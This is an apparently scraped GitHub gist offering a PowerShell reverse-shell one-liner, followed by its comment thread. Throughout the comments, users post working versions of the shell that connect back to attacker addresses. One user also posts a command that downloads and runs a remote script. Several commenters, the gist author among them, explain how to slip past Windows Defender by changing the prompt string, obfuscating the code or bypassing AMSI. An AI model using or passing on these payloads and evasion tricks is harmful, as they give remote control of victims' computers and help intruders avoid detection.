4

powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · G...

 2 years ago
source link: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · GitHub

Instantly share code, notes, and snippets.

powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok

The error msg said the powershell script running on your machine is disabled, so you will have to enable the powershell script via powershell execution policy Please follow thé instructions in : https://www.tenforums.com/tutorials/54585-change-powershell-script-execution-policy-windows-10-a.html Next time you Google thé error message then you May find solutions else you can contact the owner of the script or any one in the community.

On Sat, Jul 25, 2020, 9:51 AM Vedant Bhalgama ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------

Ok, But can we obfuscate this script? And when i run the script it says this.

[image: Capture] <https://user-images.githubusercontent.com/67494275/88453135-187ae900-ce82-11ea-9e78-8ca0bfe73ef4.PNG>

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3391030>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYMDMW4YBQS2ZMNJDRLR5KMJJANCNFSM4IKBLS6A> .

Yes it is working now! But how to obfuscate it?

You May use base64 but a simple antivirus on the target system will discover it and Block the connection after it kills the powershell process. So better you study the obfuscation and do some tests on your local machine with advanced programming even for persistance, good luck

On Sat, Jul 25, 2020, 10:07 AM Vedant Bhalgama ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------

Yes it is working now! But how to obfuscate it?

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3391043>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYPFCYOX4XQ43WOLPRDR5KOEVANCNFSM4IKBLS6A> .

Thanks Mate!

And where i can scan for the results of .ps1 file? It doesnt works on anti scan.me and nodistribute also doesnt works

If you wanna build an reverse shell backdoor you most work with other lang like c#, c, py,... Powershell is easy to spot when it has à backdoor. Or you can use virustotal(.)com but use localhost ip not your dns reverse.

On Sat, Jul 25, 2020, 10:29 AM Vedant Bhalgama ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------

And where i can scan for the results of .ps1 file? It doesnt works on anti scan.me and nodistribute also doesnt works

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3391057>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYMWXAJMZZTWWHV3SETR5KQYDANCNFSM4IKBLS6A> .

The download string dosent work like that, you are trying to create dropper which is used by blackhats hackers i hope you are not using this illegaly.

On Sat, Jul 25, 2020, 3:29 PM Vedant Bhalgama ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------

Hi! I tried to run the code and i got a connection but when i type any command the connection exits, And on the powershell side i have output like this

[image: Capture] <https://user-images.githubusercontent.com/67494275/88459081-27789000-ceb0-11ea-9961-893cf049371d.PNG> [image: Capture] <https://user-images.githubusercontent.com/67494275/88459213-49264700-ceb1-11ea-9e7a-cd06ef19c38f.PNG>

Also I am sharing the code which will download the reverse shell .ps1 from the kali server, and executes it. powershell -c "IEX(New-Object System.Net.WebClient).DownloadString(' http://10.0.2.4/mypowershell.ps1');mypowershell.ps1"

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3391242>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYOUJH6DGFWMWEY3CJDR5LT4RANCNFSM4IKBLS6A> .

Also it ran first time but second time it was detected.

Author

egre55 commented on Jul 25, 2020

try this: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')" @Vedant-Bhalgama

with your reverse shell looking like:

$client = New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

you should get a shell on your Netcat listener on port 80

In order to compile à payload u most be compatible with the lang you build payload with

On Sat, Jul 25, 2020, 3:33 PM Vedant Bhalgama ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------

Also it ran first time but second time it was detected.

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3391249>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYPV4EZCQ7NJSFJTOK3R5LUM3ANCNFSM4IKBLS6A> .

Author

egre55 commented on Jul 25, 2020

if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#"

You better learn more about sockets and back connects and more obfuscation on ps, good luck.

On Sat, Jul 25, 2020, 3:41 PM egre55 ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------

if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#"

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3391260>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYPESYT5VAQZAP3EKGTR5LVIPANCNFSM4IKBLS6A> .

Yes! I am not using it for Non Ethical purposes bro! I am a Ethical Hacker and need this for pentensting purpose!

Ethical !, OK.

On Sat, Jul 25, 2020, 4:09 PM Vedant Bhalgama ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------

Yes! I am not using it for Non Ethical purposes bro! I am a Ethical Hacker and need this for pentensting purpose!

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3391280>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYPRQWJJL3VATZVMCLDR5LYSXANCNFSM4IKBLS6A> .

Script Is running now but it gives detection error
@egre55, What were you telling to replace? to evade defender? Can u do the changes in the code?

Capture

epicn1337 commented on Aug 21, 2020

edited

One way or the other this script can be a disaster this is the best way i run such script::::::::::::: make sure you add the powershell -nop -c followed:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Which listener can be used for this? NetCat?

It got detected as MaliciousContent, Anything else? Should I try Obfuscation?

After executing it in PowerShell with IP and port changed but it is showing....... "new object exception calling ctor with 2 argument s connection attempt failed " what to do because I am not a PowerShell expert.
I run the netcat server in the Virtualbox

windows 10 has powershell script disabled for security defence.

On Tue, Nov 10, 2020 at 7:02 AM XZE3N ***@***.***> wrote: ***@***.**** commented on this gist. ------------------------------

hey, i wonder if i could get any help. I started playing around with this and it works amazing on win 7 but when I try to run it on a win 10 machine i get this error. I'm not sure if you can get around this. I'm using windows defender on this machine. [image: Screenshot (116)] <https://user-images.githubusercontent.com/63551886/98640855-764d1700-2333-11eb-8add-b469513bba0f.png>

— You are receiving this because you were mentioned. Reply to this email directly, view it on GitHub <https://gist.github.com/c058744a4240af6515eb32b2d33fbed3#gistcomment-3522306>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/AK6LSYLKJ5SKTG64UZ642QLSPDQRVANCNFSM4IKBLS6A> .

munteanulc commented on Jan 11, 2021

edited

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

Hi, Kindly check my fork.

Just a small change to the way commands are run to ensure any non-stdout text is sent back. (except for confirmation prompts).

Without this, due to the way in which the output of a command run by Invoke-Expression is handled, stderr output never gets sent back even with '2>&1' specified in your current format.

Thanks,

[vry nice )

i tried to run it silently by -WindowsStyle Hidden -NoLog but it not working , how can i run it silently

The Windows Defender action is triggerd by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"

This actually still works and doesn't trigger anything

Hi, can someone explain how this exactly works? Why is (pwd).Path triggers the antivirus. And is this reverse shell only available until a restart of the victim's pc? I didn't found any explanation online. Thanks in advance.

good job!
It detected AMSI. but I used amsi bypass script before this script running.so this script runs successfully!

mappl3 commented on Feb 1

Looks like the shell did not return stderr, is it possible to return stderr as well?

Author

egre55 commented on Feb 1

edited

hey @mappl3, feel free to add this in your fork and i'll update it ;) . you can also append 2>&1 to the end of a command to get stderr

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment


report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK